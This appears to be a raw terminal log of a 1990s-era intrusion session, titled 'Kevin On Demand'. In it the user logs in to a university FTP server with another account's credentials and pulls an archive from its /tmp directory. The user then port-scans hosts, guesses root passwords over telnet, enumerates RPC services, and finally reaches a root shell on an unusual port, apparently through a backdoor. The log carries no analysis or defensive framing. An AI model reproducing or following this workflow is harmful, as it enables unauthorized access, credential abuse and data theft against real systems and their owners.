Kevin On Demand


ftp
ftp> open president.oit.unc.edu
Connected to president.oit.unc.edu.
220 president FTP server (SunOS 4.1) ready.
Name (president.oit.unc.edu:gkremen): ingres
331 Password required for ingres.
Password: ali**
230 User ingres logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> mget c6*
mget c682x.tar.gz? y
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes
^Z
Stopped
gkremen:UNKNOWN:netcom15:/u1/gkremen:2> bg &
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes).
No job control in subshells.
[2] 4037
[2]    Exit 1               bg
gkremen:UNKNOWN:netcom15:/u1/gkremen:3> bg
[1]    sh &
gkremen:UNKNOWN:netcom15:/u1/gkremen:4> ps
  PID TT STAT  TIME COMMAND
 3933 p8 S     0:00 -csh (csh)
 3974 p8 S     0:00 sh
 3990 p8 S     0:00 ftp
 4044 p8 R     0:00 ps
gkremen:UNKNOWN:netcom15:/u1/gkremen:5> sh
$ cd /usr/spool/uucppublic
$ cd gkremen
$ ls -tla c*
-rw-------  1 gkremen    932940 Feb 14 11:25 c682x.tar.gz
-rw-r--r--  1 gkremen   5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r--  1 gkremen  10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r--  1 gkremen   4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r--  1 gkremen    891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r--  1 gkremen    449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw-------  1 gkremen    989880 Feb 14 11:25 c682x.tar.gz
-rw-r--r--  1 gkremen   5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r--  1 gkremen  10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r--  1 gkremen   4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r--  1 gkremen    891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r--  1 gkremen    449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw-------  1 gkremen   1119820 Feb 14 11:25 c682x.tar.gz
-rw-r--r--  1 gkremen   5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r--  1 gkremen  10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r--  1 gkremen   4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r--  1 gkremen    891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r--  1 gkremen    449033 Feb 14 11:18 cust.out.Z
$ which ftp
/usr/ucb/ftp
$ cd /log
/log: Permission denied
$ cd /
$ ls -ld log
drwxr-x--- 11 root         4096 Jan 12 00:01 log
$ ls -ldg log
drwxr-x--- 11 root     daemon       4096 Jan 12 00:01 log
$ cd
$ ./scan mail 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
23:telnet:
37:time:
111:sunrpc:
113:auth:
$ scan nntp 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ scan netcomsv 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
21:ftp:
23:telnet:
25:smtp:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ /usr/etc/showmount -e netcomsv
netcomsv: RPC: Program not registered
$ telnet
telnet> open netcomsv
Connected to netcomsv.
Escape character is '^]'.


SunOS UNIX (netcomsv)

login: root
Password: .fukhood
Login incorrect
login: root
Password: .neill.
Login incorrect
login: root
Password: .neill.
Login incorrect
login: ingres
Password: ali**
Login incorrect
^D
login: Connection closed by foreign host.
$ finger @netcomsv
[netcomsv] connect: Connection refused
$ pwd
/u1/gkremen
$ id
uid=17988(gkremen) gid=50(users0) groups=50(users0)
$ rpc
rpc: execute permission denied
$ rpcinfo
rpcinfo: not found
$ /usr/etc/rpcinfo -p netcomsv
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100029    1   udp    662  keyserv
    100024    1   udp    733  status
    100024    1   tcp    735  status
    100003    2   udp   2049  nfs
    100021    1   tcp    739  nlockmgr
    100021    1   udp   1028  nlockmgr
    100021    3   tcp    743  nlockmgr
    100021    3   udp   1030  nlockmgr
    100020    2   udp   1031  llockmgr
    100020    2   tcp    748  llockmgr
    100021    2   tcp    751  nlockmgr
    100021    2   udp   1032  nlockmgr
    100001    2   udp   4609  rstatd
    100001    3   udp   4609  rstatd
    100001    4   udp   4609  rstatd
    100012    1   udp   4610  sprayd
226 Binary Transfer complete.
local: c682x.tar.gz remote: c682x.tar.gz
5887242 bytes received in 2.4e+02 seconds (24 Kbytes/s)
ftp>
$ grep -v suid /etc/fstab
/dev/sd0a  /      4.2 rw 1 1
/dev/sd0g  /usr   4.2 ro 1 2
[1]  + Stopped (tty input)  sh
gkremen:UNKNOWN:netcom15:/u1/gkremen:6> fg
ftp> type
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
$ pwd
/usr/spool/uucppublic/gkremen
$ ls -tla c6*
-rw-------  1 gkremen   5887242 Feb 14 11:28 c682x.tar.gz
-rw-r--r--  1 gkremen   5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r--  1 gkremen   4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r--  1 gkremen  10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r--  1 gkremen    891779 Feb 14 11:18 c68hv.tar.Z
$ file c6*
c682f.tar.Z:    compressed data block compressed 16 bits
c682us.tar.Z:   compressed data block compressed 16 bits
c682x.tar.Z:    compressed data block compressed 16 bits
c682x.tar.gz:   data
c68hv.tar.Z:    compressed data block compressed 16 bits
$ chmod 644 *
$ touch *
$ cd
$ test1
test> open president.oit.unc.edu 3111
Trying 152.2.22.97 ...
Connected to president.oit.unc.edu.
Escape character is '^]'.

nm

SunOS UNIX (president)

president#